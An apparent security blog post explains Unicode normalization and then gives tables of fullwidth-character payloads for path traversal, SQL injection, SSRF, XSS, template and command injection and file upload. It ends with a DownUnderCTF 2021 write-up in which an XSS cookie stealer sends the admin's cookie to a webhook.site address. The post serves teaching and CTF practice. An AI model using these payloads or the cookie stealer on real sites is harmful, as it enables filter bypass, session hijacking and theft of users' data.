What is Unicode?
Unicode or formally Unicode Standard is an information technology standard for the consistent encoding, representation, and handling of text expressed in most of the world’s writing systems.
Representation
For example, “A” is mapped to U+0041, and “a” is mapped to U+0061. Unicode characters exist from U+000000 to U+10FFFF (there are more than a million symbols). Unicode divides all these possible symbols into “planes”, the best known is the BMP (Basic Multilingual Plane) that goes from U+0000 to U+FFFF (it is the Unicode plane number 1, there are 16 more, called “astral planes”).
The Unicode characters of the so-called “astral” planes can also be represented as “surrogate pairs” in UTF-16. Read more
Unicode equivalence
Unicode equivalence or Unicode normalization is the specification by the Unicode character encoding standard that some sequences of code points represent essentially the same character. On a more technical level, normalization ensures two strings that may use a different binary representation for their characters have the same binary value after normalization.
Canonical Equivalence
Canonical equivalent characters are assumed to have the same appearance and meaning when printed or displayed.
Compatibility Equivalence
Compatibility equivalence is a weaker equivalence, in that two values may represent the same abstract character but can be displayed differently.
Normalization algorithms
There are 4 Normalization algorithms defined by the Unicode standard; NFC, NFD, NFKD and NFKC, each applies Canonical and Compatibility normalization techniques in a different way. You can read more on the different techniques at unicode.org.
- NFC: Normalization Form Canonical Composition
- NFD: Normalization Form Canonical Decomposition
- NFKC: Normalization Form Compatibility Composition
- NFKD: Normalization Form Compatibility Decomposition
The general idea behind all of these algorithms is to “normalize” some code points to end up having the same character.
What is the impact?
What can we, as attackers do with Unicode?
Path traversal
Character | Payload | After Normalization |
---|---|---|
‥ (U+2025) | ‥/‥/‥/etc/passwd | ../../../etc/passwd |
︰(U+FE30) | ︰/︰/︰/etc/passwd | ../../../etc/passwd |
SQL Injection
Character | Payload | After Normalization |
---|---|---|
'(U+FF07) | ' or '1'='1 | ’ or ‘1’=’1 |
"(U+FF02) | " or "1"="1 | ” or “1”=”1 |
﹣ (U+FE63) | admin'﹣﹣ | admin’– |
Server-Side Request Forgery - SSRF
Character | Payload | After Normalization |
---|---|---|
⓪ (U+24EA) | ①②⑦.⓪.⓪.① | 127.0.0.1 |
Open Redirect
Character | Payload | After Normalization |
---|---|---|
。(U+3002) | lazarv。com | lazarv.com |
/(U+FF0F) | //lazarv.com | //lazarv.com |
Cross Site Scripting - XSS
Character | Payload | After Normalization |
---|---|---|
<(U+FF1C) | <script src=a/> | <script src=a/> |
"(U+FF02) | "onclick='prompt(1)' | “onclick=’prompt(1)’ |
Template Injection - SSTI and CSTI
Character | Payload | After Normalization |
---|---|---|
﹛(U+FE5B) | ﹛﹛3+3﹜﹜ | {{3+3}} |
[ (U+FF3B) | [[5+5]] | [[5+5]] |
OS Command Injection
Character | Payload | After Normalization |
---|---|---|
& (U+FF06) | &&whoami | &&whoami |
| (U+FF5C) | || whoami |
- Arbitrary file upload
Character | Payload | After Normalization |
---|---|---|
p (U+FF50) ʰ (U+02B0) | shell.pʰp | shell.php |
Chain reaction writeup from DownUnderCTF 2021
Upon visiting the main page, we see an option to register or login:
Register whatever account and login:
After logging in, we are presented with the option to visit our profile in the upper right corner of the page:
On our profile page, we’re able to update our username and “About me” text with the ability to report the current page to admin:
This might be an opportunity to XSS the page, but after inserting <script>alert(1)</script>
I get redirected to this page:
At this point, we know that some kind of input sanitization or character black listing is being performed. After trial and error, I decided to try encoding blacklisted characters with Unicode equivalents. Unicode Normalization reference table
I intercepted the update information request in Burp Suite and successfully broke out of HTML by injecting ""> test
in Unicode format and escaped from the HTML:
username=lazar&aboutme=%ef%bc%82%ef%bc%82%ef%b9%a5 test
This means that I can inject a simple cookie stealer which will send me the cookie in base64 and enable me to log in as the admin when he reviews the reported page. I injected the following JavaScript PoC:
%ef%bc%82%ef%bc%82%ef%b9%a5%ef%b9%a4scri%e1%b5%96t%ef%b9%a5 var i = new Image(); i.src='https://webhook.site/MYID?' %2b btoa(document.cookie) %ef%b9%a4/scri%e1%b5%96t%ef%b9%a5
Which translates to:
Here I am creating a new image element and setting its src
attribute to point to an online webhook link I created and appending user’s cookie, using document.cookie
function and encoding it to base64 using btoa
native javascript function.
Note that script
keyword is blacklisted and I had to replace p
with Unicode equivalent.
After pressing “Report Error” button on the page, my webhook came with appended base64 value:
Decoding base64 we get admin-cookie
value:
I applied the cookie to my current session by opening developer tools and executing the following:
document.cookie = "admin-cookie=COOKIE_VALUE"
Now we are able to access /admin endpoint which holds the flag: